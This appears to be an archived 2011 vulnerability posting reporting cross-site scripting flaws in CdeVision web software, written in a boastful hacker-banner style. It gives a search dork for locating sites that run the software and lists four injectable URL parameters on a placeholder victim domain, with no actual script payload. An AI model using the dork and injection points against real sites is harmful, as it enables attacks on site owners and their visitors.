Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

phpWebSite (userpage) Cross Site Scripting Vulnerabilities

dpconsulenze (dettaglio. php?id) Remote SQL injection Vulnerability

ECHO Creative Company (dettaglio. php?id) Remote SQL injection Vulnerability

Muzedon (dettaglio. php?id) Remote SQL injection Vulnerability

From:	Ehsan_Hp200_(at)_hotmail.com <Ehsan_Hp200_(at)_hotmail.com>
Date:	17.08.2011
Subject:	CdeVision Cross Site Scripting Vulnerabilities

################################  IRANIAN THE BEST HACKERS IN THE WORLD ##################
#################### ####################
##
## Cross Site Scripting Vulnerabilities
##
## CdeVision
##                           
###############################################################
###############################################################
###############################################################
###############################################################
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email    : Ehsan_Hp200@Hotmail.com
##  
## Vendor : http://www.cdevision.com/
##  
## Persian Gulf 4 Ever!
#############################
#############################
#############################
#############################
#############################
##
##

Dork : "Site by cdeVision" "Tell a Friend"

Exploite:


www.victim.com/sendtoafriend.php?sendpage=[XSS]

www.victim.com/tellafriend.php?sendpage=[XSS]

www.victim.com/send.php?sendpage=[XSS]

www.victim.com/tellafriend.php?id=[XSS]

#################################################################################
########
SpeCial TanX To :  Dj7Xpl , Skote_Vahshat
#################################################################################
#########
###############################  IRANIAN THE BEST HACKERS IN THE WORLD ##################